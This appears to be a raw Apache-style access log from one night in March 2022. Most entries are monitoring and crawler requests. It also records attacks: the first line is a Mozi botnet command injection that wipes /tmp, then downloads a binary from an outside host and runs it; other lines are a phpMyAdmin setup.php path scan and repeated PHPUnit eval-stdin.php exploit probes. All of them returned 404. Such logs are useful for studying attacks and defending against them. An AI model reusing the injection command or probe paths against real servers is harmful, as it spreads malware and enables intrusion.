112.31.8.172 - - [01/Mar/2022:22:58:01 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://112.31.8.172:46923/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
93.182.35.74 - - [01/Mar/2022:22:58:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:22:58:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.209.102.23 - - [01/Mar/2022:22:59:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:22:59:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:00:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.127.43 - - [01/Mar/2022:23:01:15 +0100] "GET http://212.91.246.82:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:16 +0100] "GET http://212.91.246.82:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:16 +0100] "GET http://212.91.246.82:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:17 +0100] "GET http://212.91.246.82:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:18 +0100] "GET http://212.91.246.82:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:18 +0100] "GET http://212.91.246.82:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:19 +0100] "GET http://212.91.246.82:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:19 +0100] "GET http://212.91.246.82:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:20 +0100] "GET http://212.91.246.82:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:21 +0100] "GET http://212.91.246.82:80/phpm/scripts/setup.php HTTP/1.0" 404 327 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:21 +0100] "GET http://212.91.246.82:80/phpmyadmin1/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:22 +0100] "GET http://212.91.246.82:80/phpMyAdmin1/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:22 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:23 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:23 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:24 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:25 +0100] "GET http://212.91.246.82:80/php-my-admin/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:25 +0100] "GET http://212.91.246.82:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:26 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:26 +0100] "GET http://212.91.246.82:80/typo3/phpmyadmin/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:27 +0100] "GET http://212.91.246.82:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:28 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:28 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:29 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:29 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
212.91.246.72 - - [01/Mar/2022:23:01:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.127.43 - - [01/Mar/2022:23:01:30 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:30 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:31 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:31 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:32 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:33 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:33 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.0" 404 354 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:34 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:34 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:35 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:36 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:36 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:37 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:38 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:38 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:39 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:39 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:40 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:41 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:41 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:42 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:42 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.0" 404 345 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:43 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:43 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:44 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:45 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:45 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:46 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.7.7/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:46 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:47 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:47 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:48 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.3/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:49 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:49 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:50 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:50 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.7/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:51 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.8/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:52 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.8.9/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:52 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:53 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:54 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:54 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:55 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:55 +0100] "GET http://212.91.246.82:80/phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:56 +0100] "GET http://212.91.246.82:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:57 +0100] "GET http://212.91.246.82:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:57 +0100] "GET http://212.91.246.82:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:58 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:58 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.0.0-rc1-english/scripts/setup.php HTTP/1.0" 404 351 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:01:59 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.0.1.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:00 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:00 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:01 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:01 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:02 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:03 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:03 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:04 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:04 +0100] "GET http://212.91.246.82:80/phpMyAdmin-3.4.3.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:05 +0100] "GET http://212.91.246.82:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:06 +0100] "GET http://212.91.246.82:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:06 +0100] "GET http://212.91.246.82:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:07 +0100] "GET http://212.91.246.82:80/php/phpmyadmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:08 +0100] "GET http://212.91.246.82:80/php/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:08 +0100] "GET http://212.91.246.82:80/_pma/scripts/setup.php HTTP/1.0" 404 327 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:09 +0100] "GET http://212.91.246.82:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:09 +0100] "GET http://212.91.246.82:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:10 +0100] "GET http://212.91.246.82:80/tools/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:11 +0100] "GET http://212.91.246.82:80/webapps/phpmyadmin/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:11 +0100] "GET http://212.91.246.82:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
205.185.127.43 - - [01/Mar/2022:23:02:12 +0100] "GET http://212.91.246.82:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
212.91.246.72 - - [01/Mar/2022:23:02:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:03:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:03:51 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:23:04:09 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:04:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:05:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:06:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:07:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.220.255.55 - - [01/Mar/2022:23:07:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"
212.91.246.72 - - [01/Mar/2022:23:08:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.237.41.88 - - [01/Mar/2022:23:08:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"
212.91.246.72 - - [01/Mar/2022:23:09:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [01/Mar/2022:23:09:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
18.237.225.129 - - [01/Mar/2022:23:10:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"
212.91.246.72 - - [01/Mar/2022:23:10:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.85.50.102 - - [01/Mar/2022:23:11:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"
212.91.246.72 - - [01/Mar/2022:23:11:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:12:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.202.43.177 - - [01/Mar/2022:23:12:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"
212.91.246.72 - - [01/Mar/2022:23:13:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.216.167.176 - - [01/Mar/2022:23:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"
181.191.92.176 - - [01/Mar/2022:23:13:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:23:14:10 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:14:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:14:52 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:15:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:16:22 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:16:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:16:32 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:17:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:18:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:19:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.201.19.99 - - [01/Mar/2022:23:20:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:20:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:20:58 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:21:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:22:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:23:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:24:00 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:24:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:25:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.34.27.87 - - [01/Mar/2022:23:26:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Mar/2022:23:26:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:27:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.162 - - [01/Mar/2022:23:28:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:28:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:29:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:30:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:31:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:32:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:33:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:34:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
